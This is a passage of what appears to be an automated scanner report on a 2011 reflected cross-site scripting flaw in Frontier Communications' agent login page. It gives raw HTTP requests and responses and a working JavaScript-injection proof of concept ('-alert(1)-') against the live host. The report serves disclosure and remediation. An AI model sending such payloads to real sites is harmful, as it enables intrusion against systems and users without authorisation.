iIiBpZD0iemlwSW5wdXQxIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJzdWJtaXRMaW5lIj48aW5wdXQgaWQ9Im92ZXJsYXlTdWJtaXQiIHZhbHVlPSIiIHR5cGU9InN1Ym1pdCI%2BPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJuZXdiaWUiIHR5cGU9ImNoZWNrYm94Ij4KICAgICAgICAgICAgICAgICAgICA8bGFiZWwgaWQ9Im5ld2JUZXh0IiBmb3I9Im5ld2JpZSI%2BQ2hlY2sgaGVyZSBpZiB5b3UgYXJlIGEgbmV3IGN1c3RvbWVyLjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgPC9mb3JtPgogICAgPC9kaXY%2BCjwvZGl2Pgo8IS0tTWFya3VwIGZvciAgT3ZlcmxheSB0aGF0IGNhbiBiZSBjbG9zZWQgd2l0aG91dCBzdWJtaXR0aW5nIHBob25lL3ppcC0tPgo8ZGl2IGlkPSJvdmVybGF5Rm9ybSIgY2xhc3M9Im92ZXJsYXkiPgogICAgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZ3JhZGllbnRCb3gucG5nIiBoZWlnaHQ9IjI2MyIgd2lkdGg9IjY0MCI%2BCiAgICA8ZGl2IGNsYXNzPSJvdmVybGF5SW5uZXIiPgogICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJjbG9zZU92ZXJsYXkiPkNMT1NFPC9hPgogICAgICAgIDxoMT5IZWxsbyE8L2gxPgogICAgICAgIDxwPlRvIHByb3ZpZGUgeW91IHdpdGggcHJvZHVjdHMgYW5kIHNlcnZpY2VzIHRoYXQgYmVzdCBtZWV0IHlvdXIgbmVlZHMsIHdlIG5lZWQgdG8ga25vdyB5b3VyIGxvY2F0aW9uLiBUaGlzIGluZm9ybWF0aW9uIGlzIGtlcHQgcHJpdmF0ZSE8L3A%2BCiAgICAgICAgPGZvcm0gbmFtZT0iZkZvcm0yIiBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI%2BCiAgICAgICAgICAgIDxkaXYgaWQ9ImVycm9yRmllbGQyIiBjbGFzcz0ib3ZlcmxheUVycm9yIj5QbGVhc2UgZW50ZXIgYSB2YWxpZCBwaG9uZSBudW1iZXIgb3IgemlwIGNvZGUuPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lTGluZSI%2BCiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJwaG9uZSI%2BUGhvbmUgTnVtYmVyPC9sYWJlbD4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lRmllbGQiPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lQWZpZWxkIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG1heGxlbmd0aD0iMyIgaWQ9InBob25lTnVtQ2hhbmdlQSIgbmFtZT0icGhvbmVOdW1DaGFuZ2VBIiBvbmtleXVwPSJyZXR1cm4gdHJhcEtleXMoZXZlbnQsdGhpcywncGhvbmVOdW1DaGFuZ2VCJyk7IiB2YWx1ZT0iIiBjbGFzcz0iZGVwdGhJbnB1dCB0aHJlZS1kaWcgcDEiIHR5cGU9InRleHQiPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lQmZpZWxkIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG1heGxlbmd0aD0iMyIgaWQ9InBob25lTnVtQ2hhbmdlQiIgbmFtZT0icGhvbmVOdW1DaGFuZ2VCIiBvbmtleXVwPSJyZXR1cm4gdHJhcEtleXMoZXZlbnQsdGhpcywncGhvbmVOdW1DaGFuZ2VDJyk7IiB2YWx1ZT0iIiBjbGFzcz0iZGVwdGhJbnB1dCB0aHJlZS1kaWcgcDIiIHR5cGU9InRleHQiPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lQ2ZpZWxkIj4KICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG1heGxlbmd0aD0iNCIgaWQ9InBob25lTnVtQ2hhbmdlQyIgbmFtZT0icGhvbmVOdW1DaGFuZ2VDIiB2YWx1ZT0iIiBjbGFzcz0iZGVwdGhJbnB1dCBmb3VyLWRpZyBwMyIgdHlwZT0idGV4dCI%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcExpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsPm9yIFppcCBDb2RlPC9sYWJlbD4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQyIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ic3VibWl0TGluZSI%2BPGlucHV0IGlkPSJvdmVybGF5U3VibWl0Q2hhbmdlIiB2YWx1ZT0iIiB0eXBlPSJzdWJtaXQiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9Im5ld2JpZSIgdHlwZT0iY2hlY2tib3giPgogICAgICAgICAgICAgICAgPGxhYmVsIGlkPSJuZXdiVGV4dCIgZm9yPSJuZXdiaWUiPkNoZWNrIGhlcmUgaWYgeW91IGFyZSBhIG5ldyBjdXN0b21lci48L2xhYmVsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0%2BCiAgICA8L2Rpdj4KPC9kaXY%2BCmRkCei%2FS%2FmrhIn%2FFNx89jqMRuohsfs%3D&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtUsername=&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtPassword=&ctl00%24ctl00%24FOBasePH%24ContentPH%24btnLogin=%C2%BB+Log+In+&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx');//]]>
...[SNIP]...

2.94. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2920'-alert(1)-'00fe8bd6112a72257 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrdering/Logind2920'-alert(1)-'00fe8bd6112a72257/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ0SGVhZGVyIj4KICAgICAgPGRpdiBjbGFzcz0ibG9nbyI%2BCiAgICAgICAgPGEgaWQ9ImhvbWVMaW5rIiB0aXRsZT0iRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMiIGhyZWY9Ii8iPgogICAgICAgICAgPGltZyBhbHQ9IkZyb250aWVyTG9nbyIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZnJvbnRpZXJfTG9nby5qcGciIGJvcmRlcj0iMCIgaGVpZ2h0PSI1MSIgd2lkdGg9IjE1NiI%2BCiAgICAgICAgPC9hPgogICAgICA8L2Rpdj4KICAgICAgPHVsIGlkPSJkcm9wZG93bl9uYXYiPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvQmlsbFBheS9Mb2dpbi5hc3B4Ij5PbmxpbmUgQmlsbCBQYXk8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2Zyb250aWVyLm15LnlhaG9vLmNvbS8iPkZyb250aWVyIE15IFlhaG9vITwvYT48L2xpPgogICAgICAgIDxsaT48YSBocmVmPSJodHRwczovL2xvZ2luLmZyb250aWVyLmNvbS93ZWJtYWlsLyI%2BRnJvbnRpZXIgTWFpbDwvYT48L2xpPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvU2hvcC9Mb2dpbi5hc3B4Ij5NeSBBY2NvdW50PC9hPjwvbGk%2BCiAgICAgICAgPGxpIGlkPSJzZWxlY3RlZCIgY2xhc3M9ImFnZW50bG9naW4iPkFnZW50IExvZ2luIAogICAgICAgICAgPGRpdiBjbGFzcz0iYXJyb3ciPjxpbWcgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vc21hbGxfYXJyb3cucG5nIiBib3JkZXI9IjAiIGhlaWdodD0iNCIgd2lkdGg9IjciPjwvZGl2PgogICAgICAgICAgPHVsPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0FnZW50T3JkZXJpbmcvTG9naW4vIj5SZXNpZGVudGlhbCBBZ2VudDwvYT48L2xpPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0J1c2luZXNzQWdlbnRPcmRlci9Mb2dpbi8iPkJ1c2luZXNzIEFnZW50PC9hPjwvbGk%2BCiAgICAgICAgICA8L3VsPgogICAgICAgIDwvbGk%2BCiAgICAgIDwvdWw%2BCiAgICAgIDxkaXYgY2xhc3M9ImxvY2F0aW9uIj5DdXJyZW50IExvY2F0aW9uOgogICAgICAgIDxhIGlkPSJMb2NhbGUiIGNsYXNzPSJjaGFuZ2VMb2NhbGUiIGhyZWY9IiMiPlNlbGVjdCBMb2NhdGlvbjwvYT4KICAgICAgPC9kaXY%2BCiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9InJpZ2h0SGVhZGVyIj4KICAgICAgPGZvcm0gYWN0aW9uPSIjIj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWFyY2hCb3giPgogICAgICAgICAgPGlucHV0IGlkPSJ0eHRTZWFyY2giIGNsYXNzPSJzZWFyY2hUZXh0IiBuYW1lPSJ0eHRTZWFyY2giPgogICAgICAgICAgPGlucHV0IGlkPSJidG5TZWFyY2giIGNsYXNzPSJTZWFyY2hCdXR0b24iIHZhbHVlPSIiIHNyYz0iL0ltYWdlcy9GVFJNYWluL3NlYWNoX2J0bi5naWYiIG5hbWU9ImJ0blNlYXJjaCIgdHlwZT0iaW1hZ2UiPiA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWFyY2hCdXR0b25zIj4KICAgICAgICAgIDxpbnB1dCB2YWx1ZT0iRnJvbnRpZXIiIGNoZWNrZWQ9ImNoZWNrZWQiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNGTGluayI%2BU2VhcmNoIEZyb250aWVyPC9zcGFuPgogICAgICAgICAgPGlucHV0IHZhbHVlPSJQb3J0YWwiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNXTGluayI%2BU2VhcmNoIHRoZSBXZWI8L3NwYW4%2BCiAgICAgICAgPC9kaXY%2BCiAgICAgIDwvZm9ybT4KICAgIDwvZGl2PgogIDwvZGl2Pgo8L2Rpdj5kAgsPZBYMAgEPZBYCAgEPZBYCZg9kFgJmD2QWAgIBD2QWBgIHDw8WBB8ABQ1FbnRlciBQaG9uZSAjHgtOYXZpZ2F0ZVVybAVKL1JlZ2lvbi9EZWZhdWx0LmFzcHg%2FdHlwZT0xJnVybD0lMmZBZ2VudE9yZGVyaW5nJTJmTG9naW4lMmZEZWZhdWx0LmFzcHglM2ZkZAIJDw8WAh8BBUovUmVnaW9uL0RlZmF1bHQuYXNweD90eXBlPTEmdXJsPSUyZkFnZW50T3JkZXJpbmclMmZMb2dpbiUyZkRlZmF1bHQuYXNweCUzZmRkAgsPDxYCHgdWaXNpYmxlaGRkAgMPZBYCAgEPZBYCZg8WAh8ABbwBPGRpdiBpZD0iVG9wTmF2X0NvbnRhaW5lciI%2BDQoJCTwvZGl2Pg0KPGlucHV0IG5hbWU9ImhmUGFnZVR5cGUiIHR5cGU9ImhpZGRlbiIgaWQ9ImhmUGFnZVR5cGUiIHZhbHVlPSIxIi8%2BDQo8aW5wdXQgbmFtZT0iaGZSZWNvcmRfVHlwZSIgdHlwZT0iaGlkZGVuIiBpZD0iaGZSZWNvcmRfVHlwZSIgdmFsdWU9IkNhdGVnb3J5Ii8%2BDQpkAgkPZBYGAgEPDxYCHwJnZBYCAgEPFgQfAAVjPGEgaHJlZj0iL0RlZmF1bHQuYXNweCI%2BSG9tZTwvYT4gJnJhcXVvOyA8YSBocmVnPSIvQWdlbnRPcmRlcmluZy8iPkFnZW50IE9yZGVyaW5nPC9hPiAmcmFxdW87IExvZ2luHwJnZAIDDxYCHwJoZAIFD2QWBAIBDxYCHwAF%2FAE8cD48c3Ryb25nPkxvZ2luIEZvciBGcm9udGllciBBZ2VudHMvUGFydG5lcnMgT25seS4gIEN1c3RvbWVycyBwbGVhc2UgdmlzaXQgPGJyPiA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbSI%2BRnJvbnRpZXIgUmVzaWRlbnRpYWwgSG9tZSBQYWdlPC9hPiBvciA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbS9DdXN0b21lclNlcnZpY2UvIj5Db250YWN0IFVzIFBhZ2U8L2E%2BIGZvciBBc3Npc3RhbmNlLjwvc3Ryb25nPjwvcD5kAg8PDxYCHgxFcnJvck1lc3NhZ2UFjgc8cCBhbGlnbj0ibGVmdCI%2BDQoJCQkJPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5Zb3UgaGF2ZSBlbnRlcmVkIGFuIEludmFsaWQgVXNlcm5hbWUgb3IgUGFzc3dvcmQuIFBsZWFzZSBub3RlIHRoYXQgdGhpcyBsb2dpbiBpcyBmb3IgQWdlbnRzL1BhcnRuZXJzIG9mIEZyb250aWVyIENvbW11bmljYXRpb25zIG9ubHkuPC9zcGFuPiA8L3A%2BDQo8dWw%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGEgUmVzaWRlbnRpYWwgQ3VzdG9tZXIsIHBsZWFzZSBjb250YWN0IDEtODAwLTkyMS04MTAxIG9yIHZpc2l0IHRoZSA8L3NwYW4%2BPGEgdGl0bGU9IlJlc2lkZW50aWFsIENvbnRhY3QgVXMgcGFnZSIgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iIHRhcmdldD0iX3NlbGYiPjxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BUmVzaWRlbnRpYWwgQ29udGFjdCBVcyBwYWdlPC9zcGFuPjwvYT7CoDxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BdG8gcmVhY2ggQ3VzdG9tZXIgU2VydmljZS48L3NwYW4%2BPC9kaXY%2BPC9saT4NCjxwIGFsaWduPSJsZWZ0Ij48c3BhbiBzdHlsZT0iQ09MT1I6ICNmZjAwMDAiPjwvc3Bhbj48L3A%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj48L3NwYW4%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGFuIEFnZW50L1BhcnRuZXIgb2YgRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMgYW5kIG5lZWQgYXNzaXN0YW5jZSB3aXRoIHlvdXIgTG9naW4sIHBsZWFzZSBjb250YWN0IDEtODY2LTc0NS05MTIyLjwvc3Bhbj48L2Rpdj48L2xpPg0KPHA%2BPC9wPjwvdWw%2BZGQCDQ8PFgIfAmhkZAIRD2QWAmYPFgIfAAXQGTxkaXYgY2xhc3M9ImZvb3RlciI%2BDQogICAgPGRpdiBjbGFzcz0iZm9vdGVyLXNlY3Rpb25zIj4NCiAgICAgICAgPGRpdiBpZD0iaGVscFN1cHBvcnQiPg0KICAgICAgICAgICAgPHVsPg0KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0iZm9vdGVyX2hlYWRpbmdzIj5IZWxwICZhbXA7IFN1cHBvcnQgPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvY3VzdG9tZXJzZXJ2aWNlLyI%2BQ29udGFjdCBGcm9udGllcjwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvYmlsbGluZy8iPkJpbGxpbmcgJmFtcDsgUGF5bWVudCBJbmZvcm1hdGlvbjwvYT4NCiAgICAgICAgICAgICAgICA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9jYXJyaWVyZnJlZXplLyI%2BUHJvdGVjdCBZb3VyIEFjY291bnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL3JldGFpbHN0b3Jlcy8iPkxvY2F0ZSBSZXRhaWwgU3RvcmVzPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Imh0dHA6Ly93d3cuZnJvbnRpZXJoZWxwLmNvbS90ZWNoc3VwcG9ydCI%2BVGVjaG5pY2FsDQogICAgICAgICAgICAgICAgICAgIFN1cHBvcnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICA8L3VsPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBjbGFzcz0iQm90dG9tX3NwYWNlciI%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGlkPSJwcm9ncmFtcyI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPlF1aWNrIExpbmtzPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSJodHRwczovL2Zyb250aWVyLmdsb2J5c29ubGluZS5jb20vY3Yvc2NyaXB0cy9BQkUwL2VuZy9sb2cuYXNwP2dydT00Mzc2NjI5MTAmYW1wO3NlYz0iPg0KICAgICAgICAgICAgICAgICAgICBCdXNpbmVzcyBPbmxpbmUgQmlsbCBQYXk8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2ZyaWVuZGxpbmsvIj5DdXN0b21lciBSZWZlcnJhbDwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvZG9uYXRlLyI%2BR3JlYXQgRnJvbnRpZXIgRG9uYXRlPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9kaXNjb3VudHByb2dyYW1zLyI%2BRGlzY291bnQgUHJvZ3JhbXM8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9hZHZlcnRpc2UvIj5BZHZlcnRpc2Ugd2l0aCBVczwvYT4gPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGNsYXNzPSJCb3R0b21fc3BhY2VyIj4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgaWQ9ImFib3V0Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BQWJvdXQgVXM8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvY29ycG9yYXRlX2NvbW11bmljYXRpb25zLyI%2BQ29ycG9yYXRlIENvbW11bmljYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9jb3Jwb3JhdGUuZnJvbnRpZXIuY29tL2RlZmF1bHQuYXNweD9tPTUmYW1wO3A9NDMiPkNhcmVlcnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL3BoeC5jb3Jwb3JhdGUtaXIubmV0L3Bob2VuaXguemh0bWw%2FYz02NjUwOCZhbXA7cD1pcm9sLWlyaG9tZSI%2BSW52ZXN0b3INCiAgICAgICAgICAgICAgICAgICAgUmVsYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9waHguY29ycG9yYXRlLWlyLm5ldC9waG9lbml4LnpodG1sP2M9NjY1MDgmYW1wO3A9aXJvbC1uZXdzJmFtcDtueW89MCI%2BDQogICAgICAgICAgICAgICAgICAgIFByZXNzIFJvb208L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL2ZhY2VzX29mX2Zyb250aWVyIj5GYWNlcyBvZiBGcm9udGllcjwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgY2xhc3M9IkJvdHRvbV9zcGFjZXIiPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibGVnYWxSZWd1bGF0b3J5Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BTGVnYWwgJmFtcDsgUmVndWxhdG9yeTwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9wb2xpY2llcy8iPlBvbGljaWVzICZhbXA7IE5vdGlmaWNhdGlvbnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvdGVybXMvIj5UZXJtcyBhbmQgQ29uZGl0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvd2hvbGVzYWxlLyI%2BV2hvbGVzYWxlICZhbXA7IENhcnJpZXIgU2VydmljZXM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2NhcnJpZXIuZnJvbnRpZXJjb3JwLmNvbS9jcnRmL3RhcmlmZnMvaW5kZXguY2ZtP2Z1c2VhY3Rpb249bWFpbiZhbXA7c2N0bklEPTE5Ij4NCiAgICAgICAgICAgICAgICAgICAgVGFyaWZmczwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxwIGNsYXNzPSJjbGVhciI%2BDQogICAgICAgIDwvcD4NCiAgICAgICAgPGRpdiBpZD0iZm9vdGVyQ3JlZGl0cyI%2BDQogICAgICAgICAgICA8ZGl2Pg0KICAgICAgICAgICAgICAgIDxzdHJvbmc%2BJmNvcHk7MjAxMSBGcm9udGllciBDb21tdW5pY2F0aW9ucyBDb3Jwb3JhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC48L3N0cm9uZz4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPCEtLQk8aW1nIHN0eWxlPSJmbG9hdDogcmlnaHQ7IiB3aWR0aD0iMzM5cHgiIGhlaWdodD0iMzdweCIgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL3Bob25lX2NvcHkucG5nIiAgLz4tLT4NCiAgICAgICAgPC9kaXY%2BDQogICAgPC9kaXY%2BDQo8L2Rpdj5kAhMPFgIfAAWJITxicj4KPCEtLU1hcmt1cCBmb3IgSW5pdGlhbCBPdmVybGF5IHRoYXQgY2Fubm90IGJlIGNsb3NlZCB3aXRob3V0IHN1Ym1pdHRpbmcgcGhvbmUvemlwLS0%2BCjxkaXYgaWQ9Im92ZXJTY3JlZW4iPiZuYnNwOzwvZGl2Pgo8ZGl2IGlkPSJvdmVybGF5SW5pdGlhbEZvcm0iIGNsYXNzPSJvdmVybGF5Ij4KICAgIDxpbWcgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL2dyYWRpZW50Qm94LnBuZyIgaGVpZ2h0PSIyNjMiIHdpZHRoPSI2NDAiPgogICAgPGRpdiBjbGFzcz0ib3ZlcmxheUlubmVyIj4KICAgICAgICA8aDE%2BSGVsbG8hPC9oMT4KICAgICAgICA8cD5UbyBwcm92aWRlIHlvdSB3aXRoIHByb2R1Y3RzIGFuZCBzZXJ2aWNlcyB0aGF0IGJlc3QgbWVldCB5b3VyIG5lZWRzLCB3ZSBuZWVkIHRvIGtub3cgeW91ciBsb2NhdGlvbi4gVGhpcyBpbmZvcm1hdGlvbiBpcyBrZXB0IHByaXZhdGUhPC9wPgogICAgICAgIDxmb3JtIG5hbWU9ImZGb3JtMSIgYWN0aW9uPSIjIiBtZXRob2Q9InBvc3QiPgogICAgICAgICAgICA8ZGl2IGlkPSJlcnJvckZpZWxkMSIgY2xhc3M9Im92ZXJsYXlFcnJvciI%2BUGxlYXNlIGVudGVyIGEgdmFsaWQgcGhvbmUgbnVtYmVyIG9yIHppcCBjb2RlLjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUxpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0icGhvbmUiPlBob25lIE51bWJlcjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUZpZWxkIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUFmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUEiIG5hbWU9InBob25lTnVtQSIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQicpOyIgdmFsdWU9IiIgY2